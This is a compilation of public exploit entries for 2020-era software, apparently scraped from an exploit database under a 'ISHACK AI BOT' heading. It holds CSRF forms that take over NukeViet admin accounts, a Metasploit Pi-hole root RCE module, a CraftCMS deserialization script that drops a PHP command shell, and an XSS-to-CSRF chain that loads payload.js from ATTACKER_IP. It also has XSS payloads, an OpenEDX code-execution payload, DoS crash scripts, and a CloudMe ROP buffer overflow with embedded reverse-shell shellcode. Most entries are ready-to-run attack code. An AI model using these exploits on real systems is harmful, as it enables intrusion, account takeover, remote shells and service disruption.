ISHACK AI BOT

# Exploit Title: NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password) # Date: 2020-05-18 # Exploit Author: JEBARAJ # Vendor Homepage: https://nukeviet.vn/ # Software Link: https://github.com/nukeviet/nukeviet/releases/download/4.4.00/nukeviet4.4.00setup.zip # Version: 4.4.00 # Tested on: Windows 10 Pro # CVE : N/A +---------------------------------------------------------------------------------------------------------------------------------------------------+ Description: NukeViet CMS v4.4.00 suffer from Cross Site Request Forgery (CSRF) vulnerability.This Vulnerabilty lets attacker change profile details and password of the user without knowing thier old password. Create a new user with admin privileges. Delete Sensitive and other log files. 1. Changing password of Admin user and thier profile details <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=users&op=edit&userid=1" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="email" value="admin&#64;admin&#46;com" /> <input type="hidden" name="first&#95;name" value="admin" /> <input type="hidden" name="last&#95;name" value="" /> <input type="hidden" name="gender" value="N" /> <input type="hidden" name="birthday" value="07&#47;05&#47;1986" /> <input type="hidden" name="sig" value="" /> <input type="hidden" name="question" value="123" /> <input type="hidden" name="answer" value="1234" /> <input type="hidden" name="photo" value="" /> <input type="hidden" name="group&#95;default" value="1" /> <input type="hidden" name="password1" value="Admin123456" /> <input type="hidden" name="password2" value="Admin123456" /> <input type="hidden" name="confirm" value="1" /> <input type="hidden" name="nv&#95;redirect" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Create new user. <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=users&op=user_add" method="POST"> <input type="hidden" name="username" value="aaaaa" /> <input type="hidden" name="email" value="aaaaaaa&#64;aaaaaaaaaa&#46;com" /> <input type="hidden" name="password1" value="VeK8hsRYn9TRk7z" /> <input type="hidden" name="password2" value="VeK8hsRYn9TRk7z" /> <input type="hidden" name="first&#95;name" value="asdf" /> <input type="hidden" name="last&#95;name" value="asdf" /> <input type="hidden" name="gender" value="M" /> <input type="hidden" name="birthday" value="01&#47;05&#47;1994" /> <input type="hidden" name="sig" value="" /> <input type="hidden" name="question" value="asdf" /> <input type="hidden" name="answer" value="asdf" /> <input type="hidden" name="photo" value="" /> <input type="hidden" name="is&#95;official" value="1" /> <input type="hidden" name="is&#95;email&#95;verified" value="1" /> <input type="hidden" name="confirm" value="1" /> <input type="hidden" name="nv&#95;redirect" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3. Deleting Log files <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=webtools&op=clearsystem" method="POST"> <input type="hidden" name="check&#95;all&#91;&#93;" value="yes" /> <input type="hidden" name="submit" value="Submit" /> <input type="hidden" name="deltype&#91;&#93;" value="clearcache" /> <input type="hidden" name="deltype&#91;&#93;" value="clearfiletemp" /> <input type="hidden" name="deltype&#91;&#93;" value="clearerrorlogs" /> <input type="hidden" name="deltype&#91;&#93;" value="clearip&#95;logs" /> <input type="submit" value="Submit request" /> </form> </body> </html> Persistent HTML injection via CSRF Since the application has xss protection header it is hard to get an XSS. HTML injection is possible via unsanitized parameter passed to database and then displayed in Informations -> system logs tab on admin panel. Vulnerable Source code: clearsystem.php -> line 58 nv_insert_logs(NV_LANG_DATA, $module_name, $lang_module['clearsystem'], implode(", ", $deltype), $admin_info['userid']); There are many instances like this triggering to html injection. P0c: htmlinjection.html <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=webtools&op=clearsystem" method="POST"> <input type="hidden" name="submit" value="Submit" /> <input type="hidden" name="deltype&#91;&#93;" value="test&#58;<input&#32;type&#61;"text"&#47;>" /> <input type="submit" value="Submit request" /> </form> </body> </html>

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Pi-Hole heisenbergCompensator Blocklist OS Command Execution', 'Description' => %q{ This exploits a command execution in Pi-Hole <= 4.4. A new blocklist is added, and then an update is forced (gravity) to pull in the blocklist content. PHP content is then written to a file within the webroot. Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc. Phase 2 writes our payload to teleporter.php, overwriting, the content. Lastly, the phase 1 PHP file is called in the web root, which launches our payload in teleporter.php with root privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Nick Frichette' # original PoC, discovery ], 'References' => [ ['EDB', '48443'], ['EDB', '48442'], ['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'], ['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'], ['CVE', '2020-11108'] ], 'Platform' => ['php'], 'Privileged' => true, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => 'May 10 2020', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES], 'Reliability' => [REPEATABLE_SESSION] } ) ) # set the default port, and a URI that a user can set if the app isn't installed to the root register_options( [ Opt::RPORT(80), OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]), OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']), OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/']) ] ) end def setup super @stage = 0 end def on_request_uri(cli, request) if request.method == 'GET' vprint_status('Received GET request. Responding') send_response(cli, rand_text_alphanumeric(5..10)) return end case @stage when 0 vprint_status('(1/2) Sending priv esc trigger') send_response(cli, %q{<?php shell_exec("sudo pihole -a -t") ?>}) @stage += 1 when 1 vprint_status('(2/2) Sending root payload') send_response(cli, payload.encoded) @stage = 0 else send_response(cli, rand_text_alphanumeric(5..10)) vprint_status("Server received default request for #{request.uri}") end end def check begin res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'), 'method' => 'GET' ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200 # <b>Pi-hole Version <\/b> v4.3.2 <b> # <b>Pi-hole Version </b> v4.3.2 <a class="alert-link lookatme" href="https://github.com/pi-hole/pi-hole/releases" target="_blank">(Update available!)</a> <b> %r{<b>Pi-hole Version\s*</b>\s*v?(?<version>[\d\.]+).*<b>} =~ res.body if version && Gem::Version.new(version) <= Gem::Version.new('4.4') vprint_good("Version Detected: #{version}") return CheckCode::Appears else vprint_bad("Version Detected: #{version}") return CheckCode::Safe end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end CheckCode::Safe end def add_blocklist(file, token, cookie) # according to the writeup, if you have a port, the colon gets messed up in the encoding. # also, looks like if you have a path (/file.php), it won't trigger either, or the / gets # messed with. data = { 'newuserlists' => %(http://#{datastore['SRVHOST']}#" -o #{file} -d "), 'field' => 'adlists', 'token' => token, 'submit' => 'saveupdate' } send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'), 'method' => 'POST', 'cookie' => cookie, 'vars_get' => { 'tab' => 'blocklists' }, 'data' => data.to_query ) end def update_gravity(cookie) vprint_status('Forcing gravity pull') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'gravity.sh.php'), 'cookie' => cookie ) end def execute_shell(backdoor_name, cookie) vprint_status('Popping root shell') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', backdoor_name), 'cookie' => cookie ) end def login(cookie) vprint_status('Login required, attempting login.') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'), 'cookie' => cookie, 'vars_get' => { 'tab' => 'blocklists' }, 'vars_post' => { 'pw' => datastore['PASSWORD'] }, 'method' => 'POST' ) end def exploit if check != CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable') end if datastore['SRVPORT'] != 80 fail_with(Failure::BadConfig, 'SRVPORT must be set to 80 for exploitation to be successful') end if datastore['SRVHOST'] == '0.0.0.0' fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') end start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => '/' } }) begin # get cookie res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'index.php') ) cookie = res.get_cookies print_status("Using cookie: #{cookie}") # get token res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'), 'cookie' => cookie, 'vars_get' => { 'tab' => 'blocklists' } ) # check if we got hit by a login prompt if res && res.body.include?('Sign in to start your session') res = login(cookie) end if res && res.body.include?('Sign in to start your session') fail_with(Failure::BadConfig, 'Incorrect Password') end # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk="> # may also include / %r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body unless token fail_with(Failure::UnexpectedReply, 'Unable to find token') end print_status("Using token: #{token}") # plant backdoor backdoor_name = "#{rand_text_alphanumeric 5..10}.php" register_file_for_cleanup backdoor_name print_status('Adding backdoor reference') add_blocklist(backdoor_name, token, cookie) # update gravity update_gravity(cookie) if @stage == 0 print_status('Sending 2nd gravity update request.') update_gravity(cookie) end # plant root upgrade print_status('Adding root reference') add_blocklist('teleporter.php', token, cookie) # update gravity update_gravity(cookie) if @stage == 1 print_status('Sending 2nd gravity update request.') update_gravity(cookie) end # pop shell execute_shell(backdoor_name, cookie) print_status("Blocklists must be removed manually from #{normalize_uri(target_uri.path, 'admin', 'settings.php')}?tab=blocklists") rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end end

# Exploit Title: CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution # Date: 2020-05-18 # Exploit Author: Wade Guest # Vendor Homepage: https://craftcms.com/ # Software Link: https://plugins.craftcms.com/vcard # Vulnerability Details: https://gitlab.com/wguest/craftcms-vcard-exploit # Version: 1.0.0 # Tested on: Ubuntu 19.10 / PHP 7.3.11 # Description: CraftCMS 3 vCard Plugin 1.0.0 - Deserialization to RCE #!/usr/bin/env python3 import sys import argparse import subprocess import requests DEFAULT_PAYLOAD = "613a323a7b693a373b4f3a33313a2247757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a6172223a343a7b733a34313a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720066696c656e616d65223b733a%s3a222e2f%s223b733a35323a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720073746f726553657373696f6e436f6f6b696573223b623a313b733a33363a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a617200636f6f6b696573223b613a313a7b693a303b4f3a32373a2247757a7a6c65487474705c436f6f6b69655c536574436f6f6b6965223a313a7b733a33333a220047757a7a6c65487474705c436f6f6b69655c536574436f6f6b69650064617461223b613a333a7b733a373a2245787069726573223b693a313b733a373a2244697363617264223b623a303b733a353a2256616c7565223b733a36373a223c7072653e3c3f70687020696628697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b202020207d203f3e0a223b7d7d7d733a33393a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a6172007374726963744d6f6465223b4e3b7d693a373b693a373b7d" def generatePayload(fname): fname_hex = str(fname).encode('utf-8').hex() fname_len_hex = str(len(fname)+2).encode('utf-8').hex() payload = DEFAULT_PAYLOAD % (fname_len_hex,fname_hex) return payload def exploitCard(url,payload): malicious_url = url + payload.decode() r = requests.get(malicious_url,verify=False) return r.status_code def encryptPayload(payload,salt): phpcomm = """$string=hex2bin("%s");$key = "%s";$key = md5( $key );$iv = substr( md5( $key ), 0, 16);echo rtrim(strtr(base64_encode(openssl_encrypt( $string, "aes128", md5( $key ), true, $iv )),"+/", "-_"), "=");""" % (payload,salt) result = subprocess.run(['php','-r',phpcomm],stdout=subprocess.PIPE) return result.stdout def main(): parser = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin") parser.add_argument('-u',dest='url',required=True,help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=") parser.add_argument('-s',dest='salt',default="s34s4L7",help="Security key required for encrypting payload. Defaul is 's34s4L7'") parser.add_argument('-f',dest='fname',default="shell.php",help="File path/name to use as value in upload path: ./<value> . Use a PHP extension. Default value is 'shell.php'") if len(sys.argv)<3: parser.print_help() sys.exit(0) args = parser.parse_args() attPayload = generatePayload(args.fname) serPayload = encryptPayload(attPayload,args.salt) if exploitCard(args.url,serPayload) == 500: print("Deserialization has been triggered, navigate to craftCMS webroot/"+ args.fname +"\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"+ args.fname +"?cmd=ls%20-al;whoami;ip%20a\n") if __name__ == '__main__': main() sys.exit(0)

# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC) # Discovered by: Xenofon Vassilakopoulos # Discovered Date: 2020-05-21 # Vendor Homepage: https://www.celestialsoftware.net/ # Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe # Tested Version: 11.21 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional x86 SP1 # Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC) # Steps to reproduce: # 1. - Run python script # 2. - Open absolutetelnet.txt and copy content to clipboard # 3. - Open AbsoluteTelnet 11.21 # 4. - Select "new connection file -> Connection -> SSH2" # 5. - Paste the contents at the field "Authentication -> Username" # 6. - press "ok" button # 7. - Crashed # 8. - Reopen AbsoluteTelnet 11.21 # 9. - A new window will appear that prompts you to send an error report # 10.- Open absolutetelnet.txt and copy content to clipboard # 11.- Paste the contents at the field "Your Email Address (optional)" # 12.- press "Send Error Report" button # 13.- Crashed buf = "\x41" * 1000 f = open ("absolutetelnet.txt", "w") f.write(buf) f.close()

# Exploit Title: forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email) # Date: 2020-05-21 # Exploit Author: Daniel Ortiz # Vendor Homepage: https://sourceforge.net/projects/forma/ # Tested on: XAMPP for Linux 64bit 5.6.40-0 ## 1 - Description - Vulnerable form: Edit Profile - Details: The validation of the CSRF token depends on request method. Changing the request method from POST to GET the token validation is omitted by the backend. - Privileges: It requires admin privileges to change the admin email. - Location: Admin Area >user profile > Edit form - Endopoint: /formalms/appCore/index.php?r=lms/profile/show&ap=saveinfo ## 2 -Triggering the Vulnerability To trigger this vulnerability the admin user must log in to the system. 1) Setup a HTTP server on the attacker machine, e.g: python -m SimpleHTTPServer 9090 2) In the attacker machine create a file with this content: [+] payload.js var target = document.location.host; var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&[email protected]&user_preference[ui.language]=0&up_signature=&save=Save+changes"; function pwnEmail(){ var xhr = new XMLHttpRequest(); xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true); xhr.send(null); } pwnEmail(); 3) Edit a course and in the description field put this payload: <script src="http://ATTACKER_IP:PORT/payload.js"/> The description field is vulnerable to XSS attacks and is used to trigger the csrf payload. 4) Go to index page in formalms/appLms/index.php?r=lms/mycourses/show this trigger the XSS payload in the description field (the payload loads the payload.js file and execute the CSRF payload) 5) The payload.js file is executed and the admin email is changed

# Title: Composr CMS 10.0.30 - Persistent Cross-Site Scripting # Author: Manuel Garcia Cardenas # Date: 2020-02-06 # Vendor: https://compo.sr/ # CVE: N/A ============================================= MGC ALERT 2020-001 - Original release date: February 06, 2020 - Last revised: May 21, 2020 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) - CVE-ID: CVE-2020-8789 ============================================= I. VULNERABILITY ------------------------- Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting II. BACKGROUND ------------------------- Composr CMS (or Composr) is a web application for creating websites. It is a combination of a Web content management system and Online community (Social Networking) software. Composr is licensed as free software and primarily written in the PHP programming language. III. DESCRIPTION ------------------------- Has been detected a Persistent XSS vulnerability in Composr CMS, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT ------------------------- Go to: Security -> Usergroups -> Edit Usergroup Select one Usergroup (for example Guest) and edit the Name (parameter name) for example with Guests"><script>alert(1)</script> The variable "name" it is not sanitized, later, if some user visit the "Zone editor" area, the XSS is executed, in the response you can view: <input type="hidden" name="label_for__access_1" value="Access for Guests"><script>alert(1)</script>" /> V. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or Javascript code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED ------------------------- Composr CMS <= 10.0.30 VII. SOLUTION ------------------------- Disable until a fix is available. VIII. REFERENCES ------------------------- https://compo.sr/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- February 06, 2020 1: Initial release May 21, 2020 2: Last revision XI. DISCLOSURE TIMELINE ------------------------- February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas February 06, 2020 2: Send to vendor April 06, 2020 3: New request, vendor doesn't answer. May 21, 2020 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester

# Exploit Title: PHPFusion 9.03.50 - Persistent Cross-Site Scripting # Date: 2020-05-20 # Exploit Author: coiffeur # Vendor Homepage: https://www.php-fusion.co.uk/home.php # Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php # Version: v9.03.50 ## How? When creating a thread or editing one of his messages with HTML content, it turns out that the injected characters are correctly escaped as it can be seen when I tried here to fuzz the message field with the string `i<3"'ivoire`. https://therealcoiffeur.github.io/captures/c5_1.png https://therealcoiffeur.github.io/captures/c5_2.png https://therealcoiffeur.github.io/captures/c5_3.png It's when I became interested in the print feature that things turned out to be interesting. Indeed, the print function allows you to simplify the page as much as possible so that it contains only text. So the print function returns all messages in text format so that the content of a thread can be easily printed (in order to generate this result it is necessary to click on the button circled in blue in figure 3).   Once the page is generated by the print functionality we realize by analyzing the body of the server response, that our characters are no longer sanitized. Now we just have to create a message that will allow us to execute JavaScript by replacing the contents of the previous message with: ```html <img onerror="alert(1)" src=xxx> ``` https://therealcoiffeur.github.io/captures/c5_4.png https://therealcoiffeur.github.io/captures/c5_5.png ## Why? The route requested to generate this result is the route <span style="color:red">\<ROOT\>/print.php?type=F&item_id=1&rowstart=0</span>. It is thus page <span style="color:red">\<ROOT\>/print.php</span> which is called, with the following parameters: ``` $_GET array (size=3) 'type' => string 'F' (length=1) 'item_id' => string '1' (length=1) 'rowstart' => string '0' (length=1) ``` File: <span style="color:red">\<ROOT\>/print.php</span> ```php ... case "F": ... echo parse_textarea($data['post_message']); ... ``` File: <span style="color:red">\<ROOT\>/includes/core_functions_include.php</span> ```php function parse_textarea($text, $smileys = TRUE, $bbcode = TRUE, $decode = TRUE, $default_image_folder = IMAGES, $add_line_breaks = FALSE, $descript = TRUE) { $text = $decode == TRUE ? html_entity_decode(stripslashes($text), ENT_QUOTES, fusion_get_locale('charset')) : $text; $text = $decode == TRUE ? html_entity_decode($text, ENT_QUOTES, fusion_get_locale('charset')) : $text; // decode for double encoding. $text = !empty($default_image_folder) ? parse_imageDir($text, $default_image_folder) : $text; $text = $smileys == TRUE ? parsesmileys($text) : $text; $text = $bbcode == TRUE ? parseubb($text) : $text; $text = fusion_parse_user($text); $text = $add_line_breaks ? nl2br($text) : $text; $text = $descript == TRUE ? descript($text) : $text; return (string)$text; } ``` As you can see by reading the function code of `parse_textarea()`, the text is not sanitized, which leads to the Stored XSS.

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR) # Date: 2020-05-20 # Exploit Author: Xenofon Vassilakopoulos # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 7 Professional x86 SP1 # Steps to reproduce: # 1. On your local machine start the CloudMe service. # 2. change the reverse tcp shellcode using the IP and Port of your host using the following command # msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0d\x0a" -f python # 3. Run the python script. import struct import socket target = "127.0.0.1" ######################################################################## # Get kernel32 address from the stack # 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe rop = struct.pack('L',0x699012c9) # POP EBP # RETN [Qt5Network.dll] rop+= struct.pack('L',0x0385FF88) # Offset rop+= struct.pack('L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll] rop+= struct.pack('L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll] rop+= struct.pack('L',0x0362fffc) # Offset rop+= struct.pack('L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll] rop+= struct.pack('L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll] # Calculate VirtualProtect relative to the leaked kernel32 address rop+= struct.pack('L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll] rop+= struct.pack('L',0xfffae493) # Offset rop+= struct.pack('L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll] ######################################################################## # Setup VirtualProtect # edi rop+= struct.pack('L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll] rop+= struct.pack('L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll] # esi rop+= struct.pack('L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect # edx rop+= struct.pack('L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll] rop+= struct.pack('L',0xffffffc0) # Value to negate, will become 0x00000040 rop+= struct.pack('L',0x41414141) # Filler rop+= struct.pack('L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll] rop+= struct.pack('L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll] # ebx rop+= struct.pack('L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll] rop+= struct.pack('L',0xfffffdff) # Value to negate, will become 0x00000201 rop+= struct.pack('L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll] rop+= struct.pack('L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll] # ebp rop+= struct.pack('L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll] rop+= struct.pack('L',0x6d9c12c9) # skip 4 bytes # eax & ecx rop+= struct.pack('L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll] rop+= struct.pack('L',0x90909090) # NOP rop+= struct.pack('L',0x68ee6b16) # &Writable location [Qt5Core.dll] # push registers to stack rop+= struct.pack('L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll] rop+= struct.pack('L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll] #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python buf = b"" buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31" buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f" buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83" buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff" buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15" buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2" buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99" buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1" buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87" buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78" buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c" buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29" buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7" buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6" buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1" buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde" buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4" buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16" buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08" buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e" buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae" buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58" buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b" buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb" buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d" buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd" buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b" ########## junk1 = "\x41"*1604 nops = "\x90"*16 junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1)) seh = struct.pack('L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll] payload = junk1 + rop + nops + buf + junk2 + seh try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,8888)) s.send(payload) except Exception as e: print(sys.exc_value)

# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution # Google Dork: N/A # Date: 2020-05-20 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://open.edx.org/ # Software Link: https://github.com/edx/edx-platform # Version: Ironwood 2.5 # Tested on: Debian x64 # CVE : CVE-2020-13144 CVE ID: CVE-2020-13144 OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced This is an authenticated vulnerability, so you need to register an account, go to /edx-studio Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code Once here we just need to edit the problem and introduce a payload such as: <problem> <script type="python"> def test_add(expect,ans): import os os.system("thecommandyouwanttoexecute") </script> <p>Problem text</p> <customresponse cfn="test_add" expect="20"> <textline size="10" correct_answer="11" label="Integer #1"/><br/> <textline size="10" correct_answer="9" label="Integer #2"/> </customresponse> <solution> <div class="detailed-solution"> <p>Solution or Explanation Heading</p> <p>Solution or explanation text</p> </div> </solution> </problem> And click Submit, and you will execute commands in the machine

# Exploit Title: Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC) # Date: 2020-05-16 # Found by: Alvaro J. Gene (Socket_0x03) # Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/ # Vulnerable Application: Konica Minolta FTP Utility # Version: 1.0 # Server: FTP Server # Vulnerable Command: NLST # Tested on: Windows 7 SP1 # Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server # "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, # such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite # some registers, an individual can use the vulnerable command to build a remote buffer # overflow exploit that will root a system without any user interaction. ==================================================================================================== =============== [ Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) ] =============== ==================================================================================================== from ftplib import FTP ftp = FTP('192.168.0.16') buffer = "A" * 1500 ftp.login() ftp.retrlines('NLST ' + buffer)

# Exploit Title: Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC) # Date: 2020-05-16 # Found by: Alvaro J. Gene (Socket_0x03) # Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/ # Vulnerable Application: Konica Minolta FTP Utility # Version: 1.0 # Server: FTP Server # Vulnerable Command: LIST # Tested on: Windows 7 SP1 # Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server # "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, # such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite # some registers, an individual can use the vulnerable command to build a remote buffer # overflow exploit that will root a system without any user interaction. ==================================================================================================== =============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] =============== ==================================================================================================== from ftplib import FTP ftp = FTP('192.168.0.16') buffer = "A" * 1500 ftp.login() ftp.retrlines('LIST ' + buffer)

